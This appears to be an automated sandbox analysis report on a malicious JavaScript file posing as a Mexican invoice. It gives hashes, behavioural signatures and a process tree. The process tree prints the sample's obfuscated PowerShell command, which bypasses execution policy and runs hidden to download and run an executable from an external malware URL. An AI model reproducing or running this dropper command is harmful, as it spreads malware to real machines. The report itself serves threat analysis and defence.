Analysis

  • max time kernel
    243s
  • max time network
    245s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    28-06-2021 16:28

General

  • Target

    CFDI 1675442 76821.js

  • Size

    34KB

  • MD5

    fef5d85788af40d874612dab6910f000

  • SHA1

    e0510f670e82ccfd1f6d74e925fbe170c7625846

  • SHA256

    4faf4fbb399a98cf3eb551a943f42bec7195287b9cb1deb11e5bd32c25d53264

  • SHA512

    d976685412bb31a22498294ad85672dca337a2f579c68771310713a2e3ac3a34a5f62885a48a1499ab743ad653072e737b517a2b6ae17c32b95b994c788762d2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://saltoune.xyz/pb/aa.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\CFDI 1675442 76821.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','%temp%kmt12.exe'); & %temp%kmt12.exe & UMkKSOqCracTlJx
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','C:\Users\Admin\AppData\Local\Tempkmt12.exe');
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1608

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1376-60-0x0000000000000000-mapping.dmp

  • memory/1608-61-0x0000000000000000-mapping.dmp

  • memory/1608-62-0x000007FEFC031000-0x000007FEFC033000-memory.dmp

    Filesize

    8KB

  • memory/1608-63-0x00000000022F0000-0x00000000022F1000-memory.dmp

    Filesize

    4KB

  • memory/1608-64-0x000000001AE20000-0x000000001AE21000-memory.dmp

    Filesize

    4KB

  • memory/1608-65-0x000000001ADA0000-0x000000001ADA2000-memory.dmp

    Filesize

    8KB

  • memory/1608-66-0x000000001ADA4000-0x000000001ADA6000-memory.dmp

    Filesize

    8KB

  • memory/1608-67-0x0000000002330000-0x0000000002331000-memory.dmp

    Filesize

    4KB

  • memory/1608-68-0x00000000024E0000-0x00000000024E1000-memory.dmp

    Filesize

    4KB

  • memory/1608-69-0x000000001C270000-0x000000001C271000-memory.dmp

    Filesize

    4KB